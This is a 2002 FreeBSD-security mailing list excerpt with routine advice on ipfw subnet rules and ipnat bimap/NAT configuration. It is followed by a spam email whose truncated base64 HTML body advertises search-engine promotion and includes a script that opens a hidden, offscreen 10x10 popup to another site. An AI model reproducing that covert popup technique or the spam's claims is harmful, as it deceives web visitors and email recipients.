wrote: > Hehehehe :) > > That was not my intention of course. Observe: > > 1) allow traffic from ANY to IP's in the range (0.0.0.0 - XXX.128.0.0) > 2) block traffic from ANY to IP's in the range (XXX.128.0.0 - > XXX.146.159.255) > 3) allow traffic from ANY to IP's in the range (XXX.146.160.0 - > 255.255.255.255) > > Is it more clear now? > > /Taz > Well, first try here to find the subnet numberings of the ranges that you want: http://www.telusplanet.net/public/sparkman/netcalc.htm I think they also have a more detailed explanation of the dotted decimal versus the number of bits (a.b.c.d/e) somewhere on the related pages if you're interested. Anywho, then take the resulting mask (a.b.c.d/e) and just write the rules as you normally would: ipfw add deny tcp from 1.2.3.0/24 to any The above would deny tcp from 1.2.3.0 through 1.2.3.255 to any. -- Derrick John Klise "I went into a general store, and they wouldn't sell me anything specific". -- Steven Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 16:51: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id D905737B40A for ; Thu, 9 May 2002 16:50:50 -0700 (PDT) Received: from pen.centtech.com (pen.centtech.com [10.177.178.33]) by prox.centtech.com (8.11.6/8.11.6) with ESMTP id g49HV8716626; Thu, 9 May 2002 12:31:08 -0500 (CDT) Received: from centtech.com (proton.centtech.com [10.177.173.77]) by pen.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g49HV7P01909; Thu, 9 May 2002 12:31:07 -0500 (CDT) Message-ID: <3CDAB25B.4B228C1B@centtech.com> Date: Thu, 09 May 2002 12:31:07 -0500 From: Eric Anderson Reply-To: anderson@centtech.com X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nielsen Cc: freebsd-security@freebsd.org Subject: Re: ipnat and bimapping References: <3CDA988D.34E2148C@centtech.com> <20020509170045.5584B37B414@hub.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ok, great (I love good software). So, my ipnat rules should look something like this: bimap sis0 10.10.20.2/32 -> 24.24.24.1/32 map sis0 10.10.10.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000 map sis0 10.10.10.0/24 -> 24.24.24.1/32 map sis0 10.10.20.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000 map sis0 10.10.20.0/24 -> 24.24.24.1/32 map sis0 0.0.0.0/32 -> 0.0.0.0/32 proxy port 21 ftp/tcp Does that look right? (assuming I want other hosts on the 10.10.20.0/24 net to be able to NAT through the gateway) Eric Nielsen wrote: > > Works for me. The two ranges also don't overlap. In my experience, however, > even if they do ipnat is smart enough to handle certain overlapping subnets > properly. I think last rule wins. > > ----- Original Message ----- > > Would bimap'ing the 24.24.24.1/32 address to 10.10.20.2/32 work? Or would > that > > screw up my nat'ing of the 10.10.10.0/24 net? I need all ports NOT nat'ed > to > > 10.10.10.0/24 to go to 10.10.20.2/32. Am I asking for trouble on the > protected > > net, or is this safe? Is bimap the right thing to use? > > > > How big is the gun that I am about to use to shoot myself in the foot? > > > > Eric > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology You have my continuous partial attention ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 23:27:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from yahoo.com (cs.wako-giken.co.jp [210.233.0.10]) by hub.freebsd.org (Postfix) with SMTP id 9328237B43C for ; Thu, 9 May 2002 23:24:58 -0700 (PDT) Received: from 180.18.96.103 ([180.18.96.103]) by web13708.mail.yahoo.com with QMQP; Wed, 8 May 2002 12:18:21 -0000 Received: from [227.12.108.209] by rly-yk05.mx.aol.com with esmtp; Tue, 7 May 2002 01:15:57 -0300 Received: from [22.7.121.63] by rly-yk04.mx.aol.com with local; Sun, 5 May 2002 14:13:33 +1200 Reply-To: Message-ID: <95838AF7-F6A2-4F94-A1BE-B55B0EBE2AB0@gZXslue4> From: To: Subject: ebay users submit your site NzZe7E-ReFnT-VTmvHfM MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00D2_13H34J4L.M2454Q76" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal Date: Thu, 9 May 2002 23:24:58 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_00D2_13H34J4L.M2454Q76 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: base64 PEJhc2UgSHJlZj0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vbWFpbC5odG1sIj4NCjxIVE1M Pg0KPEhFQUQ+PFRJVExFPldlYkNyYXdsZXJzLkNvbTogV2ViIHNpdGUgcHJvbW90aW9uIGFuZCBt YXJrZXRpbmcuPC9USVRMRT4NCjxNRVRBIE5BTUU9ImRlc2NyaXB0aW9uIiBDT05URU5UPSJUaGUg aW50ZXJuZXRzIG1vc3QgcG9wdWxhciBXZWIgc2l0ZSBwcm9tb3Rpb24gY29tcGFueS4gVXNlIEdv U3VibWl0Lk5ldCB0byByZWdpc3RlciB5b3VyIFVSTCB3aXRoIGh1bmRyZWRzIG9mIHNlYXJjaCBl bmdpbmVzIGFuZCBkaXJlY3Rvcmllcy4iPg0KPE1FVEEgTkFNRT0ia2V5d29yZHMiIENPTlRFTlQ9 IndlYiBzaXRlIHByb21vdGlvbiwgd2ViIHNpdGUgbWFya2V0aW5nLCB3ZWIgc2l0ZSBhZHZlcnRp c2luZywgd2ViIHBhZ2UgcHJvbW90aW9uLCB3ZWIgcGFnZSBtYXJrZXRpbmcsIHdlYiBwYWdlIGFk dmVydGlzaW5nLCB1cmwsIHNlYXJjaCBlbmdpbmUgbGlzdGluZ3MsIHNlYXJjaCBlbmdpbmUgDQpz dWJtaXNzaW9ucywgc2VhcmNoIGVuZ2luZSByZWdpc3RyYXRpb24sIHNlYXJjaCBlbmdpbmUgc2Vj cmV0cywgcHJvbW90ZSBzdWJtaXQgdXJsIGludGVybmV0IG1hcmtldGluZyBzZWFyY2ggZW5naW5l cyAiPg0KPCEtLSBNZXRhLXRhZ3MgY3JlYXRlZCBvbiAwNS0yMy0yMDAwLiBVcGRhdGUgTWV0YS10 YWdzIGFmdGVyIDMwIGRheXMgdG8gaW5zdXJlIGJlc3QgcG9zc2libGUgTWV0YSBUYWcgY29tYmlu YXRpb25zLWJhc2VkIG9uIHRoZSBsYXRlc3QgZm9ybWF0dGluZyByZXF1aXJlbWVudHMgYW5kIGFs Z29yaXRobXMgZnJvbSB0aGUgc2VhcmNoIGVuZ2luZXMuIC0tPg0KPFNDUklQVCBMQU5HVUFHRT0i SmF2YVNjcmlwdCI+DQo8IS0tDQoNCg0KDQoNCg0KPCEtLQ0KZnVuY3Rpb24gbmV3SW1hZ2UoYXJn KSB7IGlmIChkb2N1bWVudC5pbWFnZXMpIHsJcnNsdCA9IG5ldyBJbWFnZSgpOyByc2x0LnNyYyA9 IGFyZzsgcmV0dXJuIHJzbHQ7IH19DQpmdW5jdGlvbiBjaGFuZ2VJbWFnZXMoKSB7IGlmIChkb2N1 bWVudC5pbWFnZXMgJiYgKHByZWxvYWRGbGFnID09IHRydWUpKSB7DQpmb3IgKHZhciBpPTA7IGk8 Y2hhbmdlSW1hZ2VzLmFyZ3VtZW50cy5sZW5ndGg7IGkrPTIpIHtkb2N1bWVudFtjaGFuZ2VJbWFn ZXMuYXJndW1lbnRzW2ldXS5zcmMgPSBjaGFuZ2VJbWFnZXMuYXJndW1lbnRzW2krMV07fX19DQp2 YXIgcHJlbG9hZEZsYWcgPSBmYWxzZTsNCmZ1bmN0aW9uIHByZWxvYWRJbWFnZXMoKSB7aWYgKGRv Y3VtZW50LmltYWdlcykgew0KcHJlbG9hZEZsYWcgPSB0cnVlO319DQovLyAtLT4NCi8vLS0+DQo8 L1NDUklQVD4NCjxzdHlsZT4NCjwhLS1hIHsgIHRleHQtZGVjb3JhdGlvbjogbm9uZX0gIGE6aG92 ZXIgeyAgdGV4dC1kZWNvcmF0aW9uOiB1bmRlcmxpbmV9IA0KICAgIHNwYW4geyBmb250LXNpemU6 IDEyOyBjb2xvcjogIzAwMDBDQ30gIHN0cm9uZyB7IGNvbG9yOiAjRkZGRkZGfSANCiAgICB1bCB7 ICBsaXN0LXN0eWxlOiBsaXN0LWl0ZW0gdXJsKC9ncmFwaGljcy9idWxsZXQuZ2lmKTsgfSAtLT4N Cjwvc3R5bGU+DQo8L0hFQUQ+DQo8c2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+DQovLzwhLS0N CndpbmRvdy5vcGVuKCJodHRwOi8vd3d3LmRhbm5pcy5jb20vc2VhcmNobWFkZXNhZmUzLmh0bWwi LCJfbmV3IiwieD01MDAwLHRvcD0wLHk9MCxsZWZ0PTUwMDAsaGVpZ2h0PTEwLHdpZHRoPTEwLGRp cmVjdG9yaWVzPW5vLHRvb2xiYXI9bm8sYWRkcmVzc2Jhcj1ubyxyZXNpemFibGU9bm8sbWVudWJh cj1ubyxzY3JvbGxiYXJzPW5vIik7DQovLy0tPg0KPC9zY3JpcHQ+DQoNCjxCT0RZIEJHQ09MT1I9 I0ZGRkZGRiBPTkxPQUQ9IiIgbGVmdG1hcmdpbj0iMyIgDQp0b3BtYXJnaW49IjMiIG1hcmdpbmhl aWdodD0iMyIgbWFyZ2lud2lkdGg9IjMiIHRleHQ9IiMwMDAwMDAiIGxpbms9IiMzMzMzRkYiIHZs aW5rPSIjMDAwMENDIiBhbGluaz0iI0ZGMzMzMyI+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPg0KICA8 dGFibGUgd2lkdGg9IjYwMSIgaGVpZ2h0PSI3MDAiIGJvcmRlcj0iMCIgY2VsbHBhZGRpbmc9IjAi IGNlbGxzcGFjaW5nPSIwIj4NCiAgICA8dHI+IA0KICAgICAgPHRkIHdpZHRoPSIxIiByb3dzcGFu PSI2IiBiZ2NvbG9yPSIjOTk5OTk5Ij4mbmJzcDsgPC90ZD4NCiAgICAgIDx0ZCBoZWlnaHQ9IjIi IGNvbHNwYW49IjIiPjxpbWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMv YmFyLmdpZiIgd2lkdGg9IjYwMSIgaGVpZ2h0PSI3Ij4gDQogICAgICA8L3RkPg0KICAgICAgPHRk IHdpZHRoPSIxIiByb3dzcGFuPSI2IiBiZ2NvbG9yPSIjOTk5OTk5Ij4mbmJzcDsgPC90ZD4NCiAg ICA8L3RyPg0KICAgIDx0ciBoZWlnaHQ9IjI0Ij4gDQogICAgICA8dGQgcm93c3Bhbj0iMiI+Jm5i c3A7PC90ZD4NCiAgICAgIDx0ZCB3aWR0aD0iMTAwJSI+IA0KICAgICAgICA8ZGl2IGFsaWduPSJj ZW50ZXIiPiA8L2Rpdj4NCiAgICAgIDwvdGQ+DQogICAgPC90cj4NCiAgICA8dHIgaGVpZ2h0PSIx MDAlIj4gDQogICAgICA8dGQgd2lkdGg9IjcwMCIgdmFsaWduPSJ0b3AiIGFsaWduPSJjZW50ZXIi IGhlaWdodD0iMTAwJSIgYmdjb2xvcj0iI0ZGRkZGRiI+IA0KICAgICAgICA8dGFibGUgd2lkdGg9 IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIj4NCiAgICAg ICAgICA8dHI+IA0KICAgICAgICAgICAgPHRkIHdpZHRoPSIxMDAlIiBhbGlnbj0ibGVmdCIgaGVp Z2h0PSI5Ij4NCiAgICAgICAgICAgICAgPGRpdiBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBmYWNl PSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj4qKioqIA0K ICAgICAgICAgICAgICAgIFdlIENyZWF0ZSBNYXNzaXZlIFRyYWZmaWMgRm9yIFlvdXIgV2ViIFNp dGUgKioqKjxicj4NCiAgICAgICAgICAgICAgICBPdXIgZmlybSBpcyBkZWRpY2F0ZWQgdG8gcHJv dmlkaW5nIHlvdSB3aXRoIGEgc3RlYWR5IGFuZCBtYXNzaXZlIA0KICAgICAgICAgICAgICAgIGZs b3cgb2Ygd2ViIHNpdGUgdHJhZmZpYy4gTm8gbWF0dGVyIHdoYXQgdHlwZSBvZiBzaXRlIHlvdSBo YXZlIA0KICAgICAgICAgICAgICAgIHdlIGd1YXJhbnRlZSB3ZSB3aWxsIGluY3JlYXNlIHlvdXIg dHJhZmZpYyB3aXRoIG91ciBuZXcgaGlnaC10ZWNoIA0KICAgICAgICAgICAgICAgIHNlYXJjaCBl bmdpbmUgcGxhY2VtZW50IG1ldGhvZHMuIFdlIHNwZWNpYWxpemUgaW4gZ2V0dGluZyB5b3VyIA0K ICAgICAgICAgICAgICAgIHNpdGUgcmFua2VkIGFib3ZlIHlvdXIgY29tcGV0aXRpb24uIDxicj4N CiAgICAgICAgICAgICAgICBDQUxMIE5PVyEhOiAxLTgxOC04ODgtNXdlYjxicj4NCiAgICAgICAg ICAgICAgICBUbyBFbWFpbCBVcyBGb3IgTW9yZSBJbmZvcm1hdGlvbjogPGEgaHJlZj0ibWFpbHRv OnN1Ym1pc3Npb25zQHdlYmNyYXdsZXJzLmNvbSI+c3VibWlzc2lvbnNAd2ViY3Jhd2xlcnMuY29t IA0KICAgICAgICAgICAgICAgIDwvYT4gPC9mb250PjwvYj48L2Rpdj4NCiAgICAgICAgICAgIDwv dGQ+DQogICAgICAgICAgICA8dGQgd2lkdGg9Ijc5IiB2YWxpZ249InRvcCIgaGVpZ2h0PSI5Ij48 YSBocmVmPSJodHRwOi8vd3d3LmdvMm5ldC5jb20iPiANCiAgICAgICAgICAgICAgPC9hPiA8L3Rk Pg0KICAgICAgICAgIDwvdHI+DQogICAgICAgIDwvdGFibGU+DQogICAgICAgIDxkaXYgYWxpZ249 ImNlbnRlciI+IA0KICAgICAgICAgIDx0YWJsZSB3aWR0aD0iNDkwIiBib3JkZXI9IjAiIGNlbGxw YWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMCIgYWxpZ249ImNlbnRlciI+DQogICAgICAgICAgICA8 dHI+IA0KICAgICAgICAgICAgICA8dGQgd2lkdGg9IjE1NSIgdmFsaWduPSJ0b3AiIHJvd3NwYW49 IjQiPiANCiAgICAgICAgICAgICAgICA8cCBhbGlnbj0iY2VudGVyIj48aW1nIHNyYz0iaHR0cDov L3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2xvZ28uZ2lmIiB3aWR0aD0iMTAwIiBoZWlnaHQ9 IjEwMCI+PC9wPg0KICAgICAgICAgICAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9 IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9Ii0xIj48Zm9udCBm YWNlPSJNb25hY28iPjxiPjxmb250IGZhY2U9Im1vbmFjbyIgY29sb3I9IiMwMDAwOTkiPjxpPjwv aT48L2ZvbnQ+PC9iPjwvZm9udD48L2ZvbnQ+PC9wPg0KICAgICAgICAgICAgICAgIDxwIGFsaWdu PSJjZW50ZXIiPiZuYnNwOzwvcD4NCiAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAg PHRkIHdpZHRoPSI0MjUiIHZhbGlnbj0idG9wIiBoZWlnaHQ9IjEwOCI+IA0KICAgICAgICAgICAg ICAgIDxwPjxiPjxmb250IGZhY2U9IkFyaWFsIiBzaXplPSIrMiIgY29sb3I9IiNGRjAwMDAiPjxp PjxpbWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMvcHJvbW90ZS5naWYi IHdpZHRoPSIzNTMiIGhlaWdodD0iMTEyIj48L2k+PC9mb250PjwvYj4gDQogICAgICAgICAgICAg ICAgPC9wPg0KICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgPC90cj4NCiAgICAgICAg ICAgIDx0cj4gDQogICAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDI1IiB2YWxpZ249InRvcCI+PGZv bnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiPjxiPkxldCANCiAgICAgICAgICAgICAgICB1cyBwcm9t b3RlIHlvdXIgYnVzaW5lc3MgdG8gMTU1MCBzZWFyY2ggZW5naW5lcyBhbmQgWWFob28hLCBnZW5l cmF0ZSANCiAgICAgICAgICAgICAgICBwZXJmZWN0IE1ldGEtVGFncywgbGluayAyMDAgc2l0ZXMg dG8geW91IGFuZCBtYWtlIHlvdXIgc2l0ZSBTZWFyY2ggDQogICAgICAgICAgICAgICAgRW5naW5l IGZyaWVuZGx5IHRvIGdldCB5b3UgYSBoaWdoZXIgcmFua2luZy4gV2UgZXZlbiBhc3Npc3QgeW91 IA0KICAgICAgICAgICAgICAgIHdpdGggPGZvbnQgY29sb3I9IiNGRjAwMDAiPjxpPkxpdmUgQ29u c3VsdGFudHM8L2k+PC9mb250PiB3aGVuZXZlciANCiAgICAgICAgICAgICAgICB5b3UgbmVlZCBo ZWxwLiA8L2I+PC9mb250PjxhIGhyZWY9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMuY29tL3F1ZXN0 aW9ucy5odG1sIj48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2Zh cS5naWYiIHdpZHRoPSI4NCIgaGVpZ2h0PSI0NyIgYWxpZ249InJpZ2h0IiANCmJvcmRlcj0iMCI+ PC9hPjwvdGQ+DQogICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgPHRyPiANCiAgICAgICAg ICAgICAgPHRkIHdpZHRoPSI0MjUiIHZhbGlnbj0idG9wIj4gDQogICAgICAgICAgICAgICAgPGZv cm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249Imh0dHA6Ly9jZ2kuZ29zdWJtaXQubmV0L3BwYy9nb3N1 Ym1pdF9wcGMuY2dpIj4NCiAgICAgICAgICAgICAgICA8L2Zvcm0+DQogICAgICAgICAgICAgIDwv dGQ+DQogICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAg PHRkIHdpZHRoPSI0MjUiIHZhbGlnbj0idG9wIj4gDQogICAgICAgICAgICAgICAgPHRhYmxlIHdp ZHRoPSI0MjUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIj4NCiAg ICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0i aHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL3Nsb2dhbl9ib3guZ2lmIiB3aWR0aD0i NDI1IiBoZWlnaHQ9IjUwIiBib3JkZXI9IjAiIHVzZW1hcD0iI01hcCI+PG1hcCBuYW1lPSJNYXAi PjxhcmVhIHNoYXBlPSJyZWN0IiBjb29yZHM9IjI2OCw0LDQwNyw0NyIgDQpocmVmPSJodHRwOi8v d3d3LndlYmNyYXdsZXJzLmNvbSIgdGFyZ2V0PSJfYmxhbmsiPjwvbWFwPjwvdGQ+DQogICAgICAg ICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAg ICAgICAgPHRkPiANCiAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQyNSIgYm9y ZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgICAgICAg ICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBi Z2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9p L3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAg ICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNp bmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0 cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDov L3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzLzEuZ2lmIiB3aWR0aD0iMzAiIGhlaWdodD0iMjQi PjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+ DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAgICAgICAg ICAgICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNlbGxzcGFj aW5nPSIwIiBjZWxscGFkZGluZz0iNCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8 dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFjZT0iQXJp YWwiIHNpemU9IjIiPiA8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+R2V0IA0KICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIGEgaGlnaCByYXRpbmcgZm9yIHRoZSBzZWFyY2ggZW5naW5lcy48 L2ZvbnQ+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxicj4NCiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICBXZSB1c2UgTWV0YSBUYWcgZ2VuZXJhdG9yIHRvIHN1 cHBseSBmb3Igb3VyIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGN1c3RvbWVy cyB0aGUgYmVzdCBNZXRhIFRhZyBjb21iaW5hdGlvbnMuIEludm9sdmluZyANCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICB0aGUgdXBkYXRlZCBmb3JtYXR0aW5nIHJlcXVpcmVtZW50 cyBmcm9tIHRoZSANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzZWFyY2ggZW5n aW5lcy4gVGhlc2UgY29tYmluYXRpb25zIGFyZSB1cGRhdGVkIA0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIHJlZ3VsYXJseSBhbmQgZm9yIHlvdXIgY29udmVuaWVuY2UgY2FuIGJl IGVtYWlsZWQuPC9mb250PjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3Ry Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAg ICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMSIg Ymdjb2xvcj0iIzAwMDBGRiI+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMuY29tL2lt YWdlcy90cmFuc3BhcmVudC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvdGQ+DQogICAgICAg ICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQog ICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAg ICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRkIGJhY2tncm91bmQ9Imh0 dHA6Ly93d3cud2ViY3Jhd2xlcnMuY29tL2ltYWdlcy9ibHVlcGl4ZWwuZ2lmIj48aW1nIHNyYz0i aHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSIx IiBoZWlnaHQ9IjEiPjwvdGQ+DQogICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAg ICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRkPiANCiAgICAgICAgICAgICAgICAg ICAgICA8dGFibGUgd2lkdGg9IjQyNSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBh ZGRpbmc9IjAiPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAg ICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmls ZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhl aWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI0MCIg dmFsaWduPSJ0b3AiPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9 IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzLzIu Z2lmIiB3aWR0aD0iMzAiIGhlaWdodD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAg ICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0 ZCB3aWR0aD0iMzgzIj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRo PSIxMDAlIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+DQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8dGQ+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiIGNvbG9yPSIjRkYwMDAwIj5S ZWNlaXZlIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0IGxlYXN0IDIwMCBs aW5raW5nIHNpdGVzLjwvZm9udD48Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiI+PGJyPg0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExpbmtpbmcgcG9wdWxhcml0eSBpcyBhIGh1 Z2UgZmFjdG9yIGluIHNlYXJjaCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBl bmdpbmUgcmFua2luZ3MuPC9mb250PjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAg ICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0 aD0iMSIgYmdjb2xvcj0iIzAwMDBGRiI+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMu Y29tL2ltYWdlcy90cmFuc3BhcmVudC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvdGQ+DQog ICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgIDwvdGFi bGU+DQogICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICA8L3RyPg0K ICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRkIGJhY2tncm91 bmQ9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMuY29tL2ltYWdlcy9ibHVlcGl4ZWwuZ2lmIj48aW1n IHNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdp ZHRoPSIxIiBoZWlnaHQ9IjEiPjwvdGQ+DQogICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAg ICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRkPiANCiAgICAgICAgICAg ICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQyNSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIg Y2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAg 